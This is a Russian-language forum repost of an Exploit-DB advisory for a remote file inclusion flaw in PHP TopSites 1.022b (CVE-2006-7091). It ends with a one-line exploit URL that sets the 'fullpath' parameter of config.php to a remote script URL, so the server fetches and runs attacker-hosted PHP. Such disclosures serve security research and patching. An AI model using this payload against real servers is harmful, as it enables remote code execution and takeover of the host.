Exploit PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28791
Проверка EDB
  1. Пройдено
Автор
LE COPRA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-7091
Дата публикации
2006-10-12
Код:
source: https://www.securityfocus.com/bid/20486/info

PHP TopSites is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data.

An attacker can exploit this issue to have malicious PHP code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.022 is affected by this issue; other versions may also be affected.

http://www.example.com/[path]/config.php?fullpath=|SCRIPT-URL|
 
Источник
www.exploit-db.com

Похожие темы